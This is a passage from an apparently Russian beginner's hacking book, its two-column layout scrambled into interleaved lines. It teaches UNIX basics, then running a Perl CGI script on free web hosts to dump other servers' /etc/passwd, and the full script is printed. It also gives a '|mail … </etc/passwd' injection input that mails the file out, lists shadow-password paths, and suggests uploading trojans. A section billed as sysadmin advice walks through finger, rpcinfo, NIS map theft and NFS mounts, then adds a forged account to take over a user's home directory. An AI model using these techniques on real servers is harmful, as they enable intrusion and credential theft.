русcки. Словом, ничего интересного. смогли узнать и о сервисах самого
Но вот сам факт взлома! А юзеров
то на провайдера, о которых он почему
то
сервере сотни, поэтому это увлекательное публично умалчивает. Например, мы ясно
путешествие можно только продолжать и видим, что сервер новостей установлен:
продолжать! news USENET News,,, /var/news/etc
Ладно, все это очень интересно, но Но если просканировать порты
как же автор утянул сей ценный стуфф? И сервера (любой программой, например,
не боится ли он, что к в какой
то момент NetInfo), то наc грязно обломают и
его прикроют? Разумеется, нет, и я готов скажут, что никаких тут ньюсов нет.
поделиться с вами своим ББС (большим
Ну, как дорваться до ньюсов, это
буржуинским секретом). Ведь никакого
тема отдельного разговора, а вот
взлома автор не совершал. Файл
простенький сендмайл можно
Etc/password доступен с теми правами,
использовать и так. Порты открытые —
которые ему (да и любому другому
как на POP3 (то есть чтение почты), так
пользователю) выделил администратор. И
на SMTP (то есть ее отправку).
нечего огород городить! Etc/password — это
общедоступный ресурс — во всяком случае Впрочем, и почту и ньюсы ломать не
на чтение и всякий может его поглядеть — интересно — другое дело еще раз
было бы желание! А взглянуть на etc/password! Только как?
Попробует подрубаться по ftp (ну, а как
администратор вовсе не лох — ведь же иначе
то).
паролей в etc/password нет, как мы в этом
Набираем в браузере
в последствии убедимся.
«ftp://ftp.werbprovider.com» — так нас
Однако, как мы выяснили, что грязно пошлют подальше. Да и если бы не
пароли для взлома не всегда обязательны, послали, — все равно бы мы ничего не
— достаточно вполне знать логины и смогли увидеть.
проявить малость интуиции и
Ведь все директории, которые видны
находчивости. К тому же мы многое
по WWW или FTP — это виртуальные

87 88
Хакинг с самого начала Хакинг с самого начала

директории, которые ничего не имеют В работе с UNIX нет ничего


общего с физически расположенными на мистического и освоить простейшие
диске. И оттуда etc/password действительно операции можно в течение буквального
никогда (ну разве что очень
очень редко) одного вечера, особенно если
не бывает виден. воспользоваться толковой книжкой. К
счастью, недостатка в литературе
Как же автор получил его? Очень
испытывать не приходится, но слишком
просто — исполнил на удаленной машине
много — так же плохо, как и совсем
скрипт…
ничего. Попробуй, выбери одну книжку из
десятка, разбросанных по витрине!
Первые шаги с UNIX
Поэтому, пришлось посвятить один урок
Умение обращаться с UNIX основам UNIX, что бы помочь
необходимо каждому уважающему себя начинающим сделать первый шаг в ее
хакеру, поскольку подавляющее мир. На звание учебника эта глава не
большинство серверов работает именно претендует, но, по крайней мере, поясняет
под управлением UNIX, и прежде чем основные команды UNIX, используемые в
объяснять, как их ломать, нетрудно бы для обиходе.
начала разобраться, как это хозяйство
работает. Для UNIX существует множество
интерактивных оболочек с развитым
Для этого вовсе не обязательно пользовательским интерфейсом — от
устанавливать Red Hat или Black Cat на Mortal Commander (аналог Norton
свой компьютер, — достаточно Commander) до графических сред а ля
воспользоваться одним из эмуляторов Windows. Они помогают начинающим
UNIX или получить аккаунт на сервере освоиться в мире UNIX, но оказываются
hobbiton.org (для этого необходимо нажать крайне неудобными для удаленного
клавишу «Пуск», набрать «telnet управления компьютером. Даже текстовой
hobbiton.org» и в качестве имени Mortal Commander ощутимо тормозит на
пользователя ввести 'newuser'). модемных каналах. А о графических
Так или иначе, начнем… оболочках вспоминать и вовсе не

89 90
Хакинг с самого начала Хакинг с самого начала

приходится, — комфортная работа echo $SHELL


возможна лишь при наличии шустрой /bin/sh
локальной сети! Поэтому, придется Теперь легко определить, какая
поступиться некоторыми удобствами, и, именно оболочка запущена (конечно, при
расставшись с мышью, разговаривать с условии, что никакие злые духи не
компьютером языком текстовых команд. изменили имя исполняемого файла).
Такое общение с UNIX в чем
то
напоминает работу с Имена исполняемых файлов некоторых
популярных оболочек
интерпретатором MS
DOS Пару слов об особенностях каждой
«command.com». Разумеется, названия оболочки. Первой на свет появилась
команд окажутся другими, но в целом оболочка Борна, фактически
принцип тот же. представляющая собой язык
программирования, ориентированный на
В UNIX (в отличие от MS
DOS) нет управление процессами, вводом
выводом
стандартной командной оболочки, поэтому и операции шаблонного поиска. Никакого
первая задача пользователя — выяснить, интерактивного взаимодействия с
что именно установлено в системе, и пользователем в ней не
какие альтернативные оболочки доступны. предусматривалось, и вся работа сводилась
Путь к используемой в данный к написанию управляющих программ —
момент оболочке содержится в скриптов, обрабатываемых оболочкой.
переменной $SHELL и вывести его на Первая интерактивная оболочка,
экран можно с помощью команды «echo получившая название «С», возникла в
$SHELL» (соблюдая регистр). Результат ее университете Беркли. Она быстро
работы может быть следующим: завоевала популярность, но имела
Эмулятор UWIN множество недостатков и содержала кучу
echo $SHELL ошибок, поэтому полностью вытеснить
/usr/bin/ksh оболочку Борна так и не смогла. Проблема
же совместного сосуществования
Эмулятор CYGWIN
91 92
Хакинг с самого начала Хакинг с самого начала

заключалась в полной несовместимости LINUX сделали bash самой популярной


командных языков обоих оболочек. Это оболочкой всех времен и народов, хотя
приводило к невозможности выполнения многие до сих пор предпочитают
скриптов, написанных для одной пользоваться C
Shell или оригинальной
оболочки, другой оболочкой. оболочкой Борна. К тому же, по
прежнему
не иссякает поток энтузиастов, пишущих
К тому же открытость исходных
свои собственные оболочки.
текстов «С» вызвала появление массы
несовместимых между собой клонов. Во многих случаях различия между
Некоторые из них дожили и до наших оболочками не столь существенны и не
дней (как, например, «TC»,
своеобразный отражаются на простейших операциях, но
гибрид «С» и «TENEX» — операционной все примеры, приводимые в этой главе,
системы PDP
10). предназначены для оболочки Корна и их
успешное выполнение в других оболочках
Существовали и коммерческие
не гарантируется (хотя и предполагается).
оболочки. Из них наибольшей
Поэтому, полезно знать, какие оболочки
популярностью пользовалось творение,
установлены администратором на машине.
созданное Дэвидом Корном,
В этом поможет команда
объединившее в себе лучшие черты своих
«cat /etc/shells», результат работы которой
предшественников. Компания AT&T
на свежеустановленном эмуляторе UWIN
распространяла ее вместе с операционной
выглядит следующим образом:
системой System V, объявив стандартном
де
юре. cat /etc/shells
/usr/bin/ksh
Стандарт — хорошо, но платить /usr/bin/sh
компании никто не хотел, и вскоре /usr/bin/tcsh
оболочка Борна была полностью /usr/bin/csh
переписана в рамках проекта GNU, /bin/sh
получив название bash — Borne Again /bin/ksh
Shell. Многочисленные /bin/csh
усовершенствования и перенос в среду /bin/tcsh
93 94
Хакинг с самого начала Хакинг с самого начала

Запустить любую оболочку можно, оболочки не поддерживают такой


набрав ее имя (возможно, вместе с команды. Вместо этого пользователю
полным путем), в командной строке. А предоставляется возможность вызвать
вернуться назад обычно помогает команда внешнюю утилиту, выполняющую всю
exit. В качестве тренировочного необходимую работу. Обычно в UNIX для
упражнения полезно запустить все отображения содержимого каталога
доступные оболочки по очереди. (Чаще используется программа ls, находящаяся в
всего пути каталоге «/bin». Кстати, пользователи
эмулятора
«/usr/bin» и «/bin» указывают на один и CYGWIN прежде чем смогут ей
тот же каталог, поэтому эквивалентны воспользоваться, должны скачать с сервера
друг другу). архив fileutils.tar.gz — в минимальный
$ echo $SHELL/usr/bin/ksh комплект поставки она не входит.
$ /usr/bin/sh Вызов без параметров выводит на
# echo $SHELL экран содержимое текущего каталога, а
/usr/bin/ksh заглянуть в корень поможет наклонная
# exit черта — «ls /».
$ /usr/bin/tcsh
ls /
# echo $SHELL
A E proc
/usr/bin/ksh
base.bat etc reg
# exit
baseserviceslink.sh F sys
$ /usr/bin/csh
bin H tmp
%echo $SHELL
C home usr
/usr/bin/ksh
D lib var
%exit
dev linka win
Для просмотра содержимого
Узнать, что находится в каталоге
директорий в командном интерпретаторе
«/etc» можно, передав его имя в качестве
command.com (MS
DOS) предусмотрена
параметра команде ls:
встроенная команда «dir», но UNIX

95 96
Хакинг с самого начала Хакинг с самого начала

$ ls /etc отбивочки, тут курсивчик, вверху


crontab inetdconfig.sh passwd.add заголовок с картинкой. Вот на этом
traceit возможности HTML и исчерпываются.
in.ftpd init.exe priv.exe Чаты, скажем, уже требуют сложных
tracer.exe операций, и не могут обойтись без Java
in.rlogind login.allow profile или подобных языков. Это скрипты и есть.
ucs.exe Но для хака они не годятся.
in.rshd login.deny rc ums.exe
Почему? Да потому что исполняются
in.telnetd mailx.rc services
на локальной машине, то есть вашем
inetd.conf mkpasswd.exe shells
домашнем компьютере. А сервер только
inetd.exe passwd stop_uwin
посылает и принимает от них данные.
Скрипты Печально.
Что
то сделал автор? Говорит, Но есть другая категория скриптов
запустил скрипт на удаленной машине? — тех, что исполняются на удаленном
Но что это значит? Давайте разбираться. компьютере, то есть сервере, а вам
Вероятно, читатель уже сталкивался с отсылают (или не отсылают) результат
различными скриптами, в web
страничках. своей работы. Они имеют
Обычно они написаны на Java или Visual непосредственный доступ к системе, и
Basic. Ну, а если не сталкивался — так это если администратор не ограничит вас в
не беда, можно установить Нетскейпу и правах, то скрип может даже
совсем немного пробродить по Инет, как отформатировать жесткий диск сервера
тот начнет ругаться «Скрипт Еррор такой
или подпустить вируса или трояна. Ну, на
то». Ну что делать, — глючная вещь худой конец, просто полазить и шпионить
Нетскейп. по всем директориям (это, кстати, часто и
А скрипты — это такие программы, не запрещается).
которые расширяют возможности языка Итак, что бы ломать нужно всего
HTML. Ведь HTML позволяет только лишь иметь право выполнять программы
управлять форматированием текста — там на удаленном компьютере. На жаргоне это

97 98
Хакинг с самого начала Хакинг с самого начала

обзывается «иметь доступ к директории Выходит, Перловым скриптом мы


CGI
BIN». Тогда вы можете закинуть туда смогли просмотреть всех юзеров? Ведь
любую программу, и ее исполнить. Хоть расширение
то у файла было PL!
обычный exe
файл типа BackOrifice2000. Действительно, это Perl. И если мы
Правда, за одним небольшим найдем в себе труд хотя бы поверхностно
исключением. Исполняемый файл должен изучить этот замечательный язык, то
соответствовать модели компьютера и потом наши хакерские возможности
операционной системе, которая неограниченно расширятся! За дело,
установлена на сервере начнем изучать Perl! Однако, для начала
придется немного огорчить читателя.
Другими словами, если это Pentium
Чтобы исполнять Перловый скрипт — это
Pro и Windows NT, то можно смело кидать
же надо еще права иметь! А большинство
всех Энтевых троянов и вирусов — и они
бомажатников с халявными страничками
успешно сработают.
таких прав не имеют.
Правда, вот такую конфигурацию
Правда, все солидные и платные
найти можно не так уж часто. Гораздо
серверы такой доступ непременно дают. И
вероятнее встретить DEC Alpha и UNIX.
многие просто в обмен на баннерную
Это несколько хуже…
рекламу (например, www.agava.ru). Но у
Но существует ли способ, одинаково какого хакера найдется лишняя деньга?
хорошо приглядный для всех систем?
Выходит, что вся загвоздка в том,
Разумеется да. Для любого Юникса
чтобы найти удобный и хороший сервер. А
подойдет программа, написанная на Си.
главное бесплатный! К счастью такие
Правда ее не «берет» NT. Зато Perl
сервера есть! Пусть немного, но нам
одинаково хорошо воспринимается, как
хватит, для начала, а потом, потом мы
UNIX, так и NT. Если, правда, установлен
научимся получать доступ и к тем, кто
его интерпретатор. Но, обычно он все же
такие права зажимает.
установлен.
Кстати, многие www
сервера имеют
незакрытый доступ к cgi
bin и если

99 100
Хакинг с самого начала Хакинг с самого начала

хорошо поискать, то их можно найти! VirtualAve


Правда, если тамошний админ не совсем Дает под страничку 20 Мб. Вместе с
лох, то такую дырку он быстро прикроет, этим доступ к cgi
bin, и разрешает
стоит только сунуться! выполнять Perl
скрипты.
Но, об этом потом, а пока смотрите Имеет древний sendmail, который
список серверов, где такой доступ дается так же интересно поковырять (или просто
за просто так! отправлять почту в свое удовольствие).
Предоставляет домен третьего
Сервера, дающие странички и
уровня, то есть вы получите что
то вроде
право исполнять CGI http://yourname.virtualave.net/.
Вообще
то традиционно за право
выполнить CGI нужно платить, да еще и Разрешает закачку по FTP, однако
зарегистрироваться так, чтобы в случае имя сервера для этого выглядит иначе
чего администратор мог вас найти и (например, ftp://server26.virtual.ave).
надавать по ушам. Ведь имея такой доступ Внимательно читайте инструкцию.
к системе можно сделать очень и очень Пока лучший из всей категории.
много плохого. Кому это понравится? Реклама — выпрыгивающий баннер.
Но, тем не менее, в Internet найти Однако, мучительно долго регистрирует
можно все! И даже таких вас в системе. Необходимо ждать целые
администраторов, которые сутки, прежде чем вам откроют аккаунт. К
расщедриваются на такой доступ, да еще и тому же скорость не самая лучшая из
предоставляют его на халяву! Чтобы их возможных, но для скриптов сойдет.
найти, можно набить в любом поисковике Hypermart
«CGI+Free+Perl» или побродить по
Дает под страничку 10 мегабайт (для
страничкам, сборникам ссылок на халяву.
скриптов это очень много), разумеется,
Словом, если вас не устроит ни один дает право исполнения Perl скриптов и
пункт из списка, приведенного ниже, то почтовой рассылки.
всегда можно найти что
то и самим.
101 102
Хакинг с самого начала Хакинг с самого начала

Очень надоедает своими баннерами, Webjump


зато это один из старейших сервисов и его Обещает 25 мегабайт и доступ к
скоро не прикроют. CGI
BIN, но очень часто его (доступ)
вырубает на случайное время, да и Perl
В дополнение к этому дает
какой
то кривой стоит, часто проблемы с
возможность создавать собственную нью

исполнением скриптов.
конференцию, ну и домен третьего уровня
типа «http://yourname.hypermart.net/». Очень
очень
очень увешан
Впрочем, домен регистрируется в течении баннерами, но зато дает домен третьего
нескольких часов, но доступ типа уровня и самое главное, содержит
«http://server26.hypermart.net/ kpnc» офигенное число дыр, которые сразу не
появляется тут же. заткнут (не успеют) — поэтому
тренироваться начинающим хакерам на
Так же доступен по FTP, но очень
нем самое
то!
неплохо защищен, и начинать с него не
советую, хотя в остальных отношениях — ProHosting
рульный сервак. Довольно неплохой сервер, быстрый
Правда есть одно «но» — чтобы и приятный. Регистрирует ваш домен в
получить доступ, нужно ввести код течение четырех часов. Но никаких
подтверждения, высылаемый вам на e
дополнительных сервисов тут нет.
mail. Вот тут вся и
JustFree
загвоздка — все бесплатные e
mail
отметаются сервером, как саксь и маст Дает доступ к cgi
bin и Шеллу.
дай. В том числе и часть платных Очень тормозит, но это один из очень
российских тоже, например, ZMAIL.RU и немногих серверов, дающий халявный
TELEMEDNET.RU. Поэтому придется Шелл, так что придется с этим
извращаться и где
то искать платный примириться.
ящик или иметь договоренность с его
автором, на изыску писем.

103 104
Хакинг с самого начала Хакинг с самого начала

Заливаем наш первый скрипт! Обращаю внимание, что имя хоста


Итак, будем считать, что на сервере по FTP может не совпадать с WWW, —
вы себе аккаунт поимели по полной читайте об этом подробнее в инструкции
программе. Это не такая сложная на сервере!
операция, чтобы на ней останавливаться. Вот и все. Дважды долбанем по Enter
Достаточно лишь заполнить форму, в и дождемся пока оно соединиться. Если
которой нас будут придирчиво при этом вас отошлют, то что
то сделано
расспрашивать о наших занятиях и неправильно, а может, аккаунт еще не был
доходах, — если что введем не правильно, зарегистрирован. Подождите и попробуйте
и нас пошлют, так можно попробовать снова!
еще раз!
После того, как вы соединитесь с
Теперь остается только залить на сервером, заливать файлы будет можно,
наш новый аккаунт свой первый скрипт и как в обычном Norton Commander, только
полюбоваться результатами его работы. естественно, намного медленнее.
Заливать, конечно, будем по FTP. Для
этого нам потребуется FTP
клиент, Но в какую директорию закачивать
поддерживающий закачку. Например, всем скрипты? Конечно же, в
известный FAR. /CGIBIN, если только она есть! Но ее
может и не быть! Это не повод нервничать
Запустим его и в панели дисков и волноваться. Значит, скрипты могут
выберем «FTP». выполняться в другой директории. Так у
Теперь нажмем <ShiftF4> и в «HyperMart» — это корневая директория
появившемся окне диалога введем наш вашего аккаунта, а на «Virualave» это
логин, пароль и хост (то есть, имя /public_html. Но прежде чем что
то
сервера). закачивать, это «что
то» надо создать. А
для этого нужно знать Perl. Впрочем,
можно по началу поучиться на чужих
скриптах.

105 106
Хакинг с самого начала Хакинг с самого начала

Но это еще не все! После того, как расположенном на сервере не останется.


скрипт залит на сервер, ему необходимо Впрочем, вам на
установить атрибуты исполняемого, иначе e
mail так же должна прийти инструкция с
он исполняться не захочет. подробными разъяснениями.
Для этого опять воспользуется уже Итак, набираем сие в браузере,
успевшим нам полюбиться FAR
ом. например, http://kpnc.hypermart.net/hello.pl
Встаньте на только что закаченный файл и для «Hypermart» и любуемся файлом
нажмите <CtrlA>. Установите атрибуты etc/password этого сервера. Любуемся
<X> от eXecutable — то есть, исполняемый настолько, что я даже рискнул привести
и нажмите Enter. всю таблицу целиком:
Но, возможно, этого делать и не DISPLAY ETC/PASSWORD FILE…
придется, если директория, куда вы LOGIN NAME PATH
собрались копировать скрипт, уже имеет root System Administrator
такие атрибуты (тогда они наследуются, то /root
есть передаются по умолчанию, всем toor System Administrator
расположенным в этой директории /root
файлам). Просмотреть их можно точно так daemon System Daemon
же, переместив на нее курсор и нажав /
<CtrlA> sys Operating System
/tmp
Все! Теперь пришло время испытать bin BSDI Software
сей агрегат в действии. Наберите в строке /usr/bsdi
браузера путь к скрипту… стоп, а откуда operator System Operator
мы его знаем? Как он должен выглядеть? /usr/opr
Сложно сказать однозначно. Все uucp UNIXtoUNIX Copy
зависит от конкретных настоек сервера. /var/spool/uucppublic
Поэтому ничего, кроме как сходить и games Games Pseudouser
почитать об этом в faq, заботливо /usr/games
news USENET News,,,
107 108
Хакинг с самого начала Хакинг с самого начала

/var/news/etc nonroot Nonroot root user for


demo Demo User NFS /nonexistent
/usr/demo hmvbin 6553666559 reserved for
mail Sendmail hmv /nonexistent
/var/spool/mail Караул! Тут нет ни одного юзера!
brian Brian Atkins,,, (ну, кроме demo). Верно, а что вы хотели?
/export/home/brian Сказано же было, что сервер старый,
alias ,,, вылизанный, дыры все убраны, и
/var/qmail/alias пользователи за просто так не
qmaild ,,, отображаются.
/var/qmail
qmaill ,,, Впрочем, в дальнейшем мы все же
/var/qmail на него попадем, но это будет не сейчас…
qmailp ,,, Сейчас же мы попробуем какой
нибудь
/var/qmail другой сервер, что настроен по
qmailq ,,, отношению к юным хакерам не так
/var/qmail агрессивно.
qmailr ,,,
/var/qmail Немного хитростей и уловок
qmails ,,, Хитрость 1
/var/qmail Результат работы скрипта не виден
ftp FTP Daemon,,, под Нетскейп. Ну, так написан скрипт.
/var/spool/ftp Пользуйтесь милым моему сердцу
proftp FTP Daemon,,, Эксплорером! А Нетскейп такая глючная
/var/spool/ftp вещь!
www Publish Account,,,
/usr/home/www Хитрость 2
nobody Unprivileged user Все это, конечно, очень круто, но
/nonexistent ведь очень часто случается так, что
доступа к скриптам нам никто не дает. А
109 110
Хакинг с самого начала Хакинг с самого начала

файл
то (известно какой) утянуть хочется! Хитрость 3
Можно ли это сделать? Иногда да, только Обратите внимание на следующие
нужно поискать дырки в существующих строки скрипта:
скриптах. ($login, $pass, $uid, $gid, $name,
А очень часто бывает так, что они $home_dir, $shell) = split(':');
есть, только незаметны с первого взгляда.
Вот пусть, например, на сервере где
то print "<tr>
есть какой
то скрипт (сейчас не важно print "<td>
какой и где), но который запрашивает у print "$login";
пользователя имя файла, которое надлежит print "<td>
открыть (очень часто бывает в различных print "$name";
web
почтовых ящиках, да и в других print "<td>
случаях то же). print "$home_dir"l
То есть пароль считывается из
Тогда можно ввести что
то вроде
файла, но не выводится?! Истинно так.
«|mail VasyaPupukin@mail.com </etc/passwd»,
Если хотите его увидеть, то добавьте еще
разумеется без кавычек, как мы имеем
одну строчку в скрипт. Догадайтесь, как
неплохие шансы получить этот файл на
она должна выглядеть — уверяю, вас это
«дом», что называется с доставкой.
не оставит равнодушными!
Далеко не все разработчики
скриптов учитывают такую ситуацию. Приложение 1. Скрипт hack.pl
Поэтому, однозначно, дыры в системах #!/usr/local/bin/perl
безопасности есть и они вокруг нас! Надо print "Contenttype: text/html\n\n";
только хорошо поискать и не боятся print "<BODY TEXT=#342E27
экспериментировать! BGCOLOR=#D4D3C7
BACKGROUND=http://dore.on.ru/kpnc/imag
es/BACK1.JPG>";
print "&lg;IMG SRC=
http://dore.on.ru/kpnc/images/PH.JPG><

111 112
Хакинг с самого начала Хакинг с самого начала

BR>"; Приложение 2. Где хранятся


print "Пожалуйста, посетите сайт <A пароли?
href=http://kpnc.id.ru>PRO
Если админ не совсем лох, то в
HACK</a><BR>";
etc/passwd паролей не будет. Там можно
print "DISPLAY ETC/PASSWD FILE… \n";
обнаружить только «крестики». А сами
print "<TABLE widht=100% border=2>";
пароли где? А пароли совсем в другом
print "<tr>";
месте, и обычно это место от рядового
print "<TH bgcolor=RED> LOGIN";
юзера скрыто. То есть, доступ отрублен.
print "<TH bgcolor=RED> NAME";
Но иногда случается так, что это сделать
print "<TH bgcolor=RED> DIR";
забыли!
open(PASS, "</etc/passwd") || die;
Так скажите же, где то золотое
while() место! Увы, оно не одно и зависит от
{ настоек администратора и выбранной
($login, $pass, $uid, $gid, $name, системы. Ниже приводятся конфигурации
$home_dir, $shell) = split(':'); по умолчанию. Попытайтесь, — быть
print ""; может вам повезет:
print "";
AIX 3
print "$login";
/etc/security/passwd/tcb/auth/files/&l
print "";
g;first letter username>/<username>
print "$name";
print ""; A/UX 3.0s
print "$home_dir"; /tcb/files/auth/?/*
} BSD4.3.Reno
print "</table>"; /etc/master.passwd
close(PASS); ConvexOS 10
/etc/shadpw
ConvexOS 11
/etc/shadow

113 114
Хакинг с самого начала Хакинг с самого начала

DG/UX UNICOS
/etc/tcb/aa/user/ /etc/udb
EP/IX Как этим пользоваться? Очень
/etc/shadow просто — заменить путь в следующей
HP.UX
сточке скрипта на новый.
/.secure/etc/passwd open(PASS, "</etc/passwd") || die;
IRIX 5
/etc/shadow Советы системному
Linux 1.1 администратору
/etc/shadow
Каждый день по всему миру
OSF/1
взламываются компьютерные сети и
/etc/passwd[.dir|.pag]
сервера. Уровень этих атак различен.
SCO Unix #.2.x Вопреки общему представлению, что
/tcb/auth/files/<first letter большинство из них происходит из
за
username>/<username> слабых паролей, множество атак
SunOS4.1+c2 использует более сложный способ. Эти
/etc/security/passwd.adjunct способы менее известны и их трудно
обнаружить. Чтобы защититься от таких
проникновений, необходимо понимать их.
SunOS 5.0 Мы попытаемся пояснить некоторые из
/etc/shadow них…
System V Release 4.0
/etc/shadow Большинство книг и документов,
посвященных защите, смотрят на нее
System V Release 4.2 глазами администратора — человека,
/etc/security/ который сидит внутри системы и иногда
databaseUltrix 4 плохо представляет ее внешние границы.
/etc/auth[.dir|.pag] Давайте отойдем от привычных

115 116
Хакинг с самого начала Хакинг с самого начала

представлений о системе защиты. 1. finger и rusers


Посмотрим на нее глазами devil# finger @www.xxx.xxxx.su
потенциального взломщика. Для этого [www.xxx.xxxx.su]
человека ваша система — черный ящик Login Name
(или коробка шоколадных конфет). TTY Idle When
Показывая, что он может сделать для того Office
чтобы получить доступ на ваш компьютер, kuzmenko Vladimir Kizmenko p0
мы пытаемся помочь системным 4:57 Sun 08:25
администраторам получить представление kuzmenko Vladimir Kizmenko p1
о том, насколько реально защищен ваш 2:38 Sun 08:26
хост. Мы не предполагаем раскрыть здесь milichen Yuri Mulichenko p4
все технологии и лазейки в системе — их 4:59 Fri 19:41 3B/r410 13513
количество растет каждый день. Системы sherbak Eugeny Scherbkov p5
усовершенствуются — изменяются 5:00 Sat 10:18 221/r448 17733
технологии.
Какую информацию мы можем devil# finger yur@ccsix.xxxx.xxxx.ru
получить об удаленной системе? [ccsix.xxxx.xxxx.ru]
Существует множество сетевых сервисов, к Login: yur
которым следует обратиться: finger, rusers, Name: Yuri A. Podgorodsky
showmount, rpcinfo, dns, ftp, sendmail… В Directory: /home/yur
идеале стоит собирать всю возможную Shell: /bin/bash
информацию — информация это власть. On since Sat Apr 12 12:24 (MSK) on
Давайте попробуем. Что мы можем ttyp0 from jannet.xxxx.xxxx
узнать? 3 hours 35 minutes idle
Mail forwarded to
Возможно неплохой шаг сначала yur@jannet.xxxx.xxxx.ru
узнать возможные allias, имя nameserver и No mail.
состав сети, в которой стоит этот хост. В No Plan.
этом может помочь nslookup. devil# rusers l unisun.xxxxxxxx.net
117 118
Хакинг с самого начала Хакинг с самого начала

Login Name unknown


TTY When Idle 100000 2 udp
Host 0.0.0.0.0.111 rpcbind
lavrov unisun.xxxxx unknown
xxx:console Apr 2 10:32 17:37 100004 2 udp
suh unisun.xxxxx 0.0.0.0.2.150 ypserv
xxx:ttyp0 Apr 5 10:20 unknown
17:32 (mskws.desy.de) 100004 2 tcp
lavrov unisun.xxxxx 0.0.0.0.2.151 ypserv
xxx:ttyp1 Apr 2 11:21 unknown
25:55 (:0.0) 100004 1 udp
lavrov unisun.xxxxx 0.0.0.0.2.150 ypserv
xxx:ttyp2 Apr 2 10:33 unknown
97:11 (:0.0) 100004 1 tcp
Эти сервисы дают нам аккаунты, 0.0.0.0.2.151 ypserv
позволяют нам узнать кто в данный unknown
момент работает в системе, их shell и 100069 1 udp
домашний каталог, возможно имена 0.0.0.0.2.152 
доверенных хостов. Обратите внимание на unknown
графу Idle, если в ней стоит несколько 100069 1 tcp
часов, то скорее всего в данный момент 0.0.0.0.2.154 
никто не обратит на вас внимание. unknown
100007 2 tcp
2. rpcinfo 0.0.0.0.4.0 ypbind
devil# rpcinfo sun10.xxx.xxx.su unknown
program version netid address 100007 2 udp
service owner 0.0.0.0.4.3 ypbind
100000 2 tcp unknown
0.0.0.0.0.111 rpcbind 100007 1 tcp

119 120
Хакинг с самого начала Хакинг с самого начала

0.0.0.0.4.0 ypbind 100005 2 tcp


unknown 0.0.0.0.2.226 mountd
100007 1 udp unknown
0.0.0.0.4.3 ypbind 100024 1 udp
unknown 0.0.0.0.2.226 status
100028 1 tcp unknown
0.0.0.0.2.156 ypupdated 100024 1 tcp
unknown 0.0.0.0.2.228 status
100028 1 udp unknown
0.0.0.0.2.158 ypupdated 100021 1 tcp
unknown 0.0.0.0.2.229 nlockmgr
100009 1 udp unknown
0.0.0.0.3.255 yppasswdd rpcinfo дает информацию о
unknown запущенных RPC сервисах. Наиболее
100029 1 udp интересны из них mountd, nisd, ypserv и
0.0.0.0.2.159 keyserv ypbind, statd, bootparam, pcnfsd, rexd. statd
unknown позволяет стереть удаленно любой файл.
100003 2 udp pcnfsd и mountd дают доступ к дискам
0.0.0.0.8.1 nfs машины, rexd — удаленное выполнение
unknown команд.
100005 1 udp
0.0.0.0.2.223 mountd 3. NIS (nisd, ypbind, ypserv).
unknown Если эта машина является NIS
100005 2 udp сервером, то зная NIS имя домена вы
0.0.0.0.2.223 mountd можете получить любые NIS карты
unknown простым rpc запросом. Обычно это имя
100005 1 tcp совпадает с именем домена и можно
0.0.0.0.2.226 mountd попытаться его угадать:
unknown
devil# ypx dg sun10.xxx.xxx.su

121 122
Хакинг с самого начала Хакинг с самого начала

Trying domain sun10.xxx.xxx.su YP map transfer successfull.


Trying domain sun10 Мы заменили первые два символа
Trying domain xxx.xxx.su каждого пароля на «__» и изменили имена
sysdiag:*:0:1:Old System здесь и далее в тексте.
Diagnostic:/usr/diag/sysdiag:/usr/diag
/sysdiag/sysdiag Если угадать NIS имя домена не
sundiag:*:0:1:System удается, возможно получить его через
Diagnostic:/usr/diag/sundiag:/usr/diag bootparam сервис или подсмотреть в
/ директории /var/yp, если она доступна
sundiag/sundiag публично.
sybase:*:13:55:syb:/usr/nms/sybase:/bi 4. showmount
n/csh
devil# showmount e
nobody:*:65534:65534::/:
thsun1.xxxx.xxxxx.su
daemon:*:1:1::/:
export list for thsun1.xxxx.xxxxx.su:
audit:*:9:9::/etc/security/audit:/bin/
/pub
csh
(everyone)
uucp:*:4:8::/var/spool/uucppublic:
/opt
sync:__F324VMRDcL6:1:1::/:/bin/sync
thsun2,thsun3,tlx39
root:__Ye.Ibw.8uQg:0:3:Operator:/:/bin
/pgm/linux
/csh
(everyone)
news:*:6:6::/var/spool/news:/bin/csh
/export
sys:*:2:2::/:/bin/csh
(everyone)
snm:__7ck.pfEh/2s:11:11:Network
/usr
Manager:/usr/snm:/bin/csh
(everyone)
rom:__IriAsoksSeE:10:10:Victor
/tftpboot
Romanchik:/usr/rom:/bin/csh
(everyone)
nms:*:12:55:Network
/cdrom/sol_2_3_hw894_sparc/s0
Manager:/usr/nms:/bin/csh
(everyone)
bin:*:3:3::/bin:
/home

123 124
Хакинг с самого начала Хакинг с самого начала

(everyone) 512 Feb 14 11:16 lnp


/scratch/users drwxrxrx 6 root other
(everyone) 512 Feb 14 11:19 lnup
С помощью showmount мы узнали о drwxrxrx 4 root other
разделах, предоставляемых этим хостом, о 512 Jan 15 1995 lnur
правах доступа к ним и возможно о devil# cd lnup
доверенных хостах. Такие важные каталоги devil# ls al
как export, home, usr доступны всем! total 12
Попробуем… drwxrxrx 6 root other
512 Feb 14 11:19 .
devil# mount F nfs
drwxrxrx 17 root root
thsun1.xxxx.xxxxx.su:/home /mnt
1024 Jun 28 1996 ..
devil# cd /mnt
drwxrxrx 3 6000 600
devil# ls al
512 Oct 30 1995 dolbilov
total 12524
drwxrxrx 9 6190 600
drwxrxrx 17 root root
1024 Oct 7 1996 davgun
1024 Jun 28 1996 .
drwxrxrx 4 6001 600
drwxrxrx 28 root root
512 Oct 20 1995 gvf
1024 Apr 12 16:29 ..
drwxrxrx 4 6003 600
drwxrxrx 2 root root
512 Apr 4 10:31 yup
512 May 19 1995 TT_DB
devil# echo 'dolbilov::600:' >>
drwxrxrx 3 root 798
/etc/groups
512 Nov 25 1994 cfi
devil# echo
drwxrxrx 6 root 100
'dolbilov:x:6000:600::/noway:/bin/csh'
512 Nov 25 1994 dug
>> /etc/passwd
drwxrxrx 9 root other
devil# su dolbilov
512 Feb 17 11:19 lcta
$ cd dolbilov
drwxrxrx 3 root other
$ ls al
512 Jun 19 1996 lhep
total 30
drwxrxrx 6 root other

125 126
Хакинг с самого начала Хакинг с самого начала

drwxrxrx 3 dolbilov dolbilov 220 www.xxx.ru ESMTP Sendmail


512 Apr 12 16:21 . 8.8.5/8.8.5; Sat, 12 Apr 1997
drwxrxrx 6 root other 15:55:36 +0400
512 Feb 14 11:19 .. vrfy serg
rwrr 1 dolbilov dolbilov 550 serg… User unknown
2901 Apr 7 1993 .cshrc vrfy alex
rwrr 1 dolbilov dolbilov 250 Alexei E. Katov <ALEX@WWW.XXX.RU
1550 Apr 7 1993 .login Так мы попытались угадать
rwrr 1 dolbilov dolbilov несколько системных аккаунтов и конечно
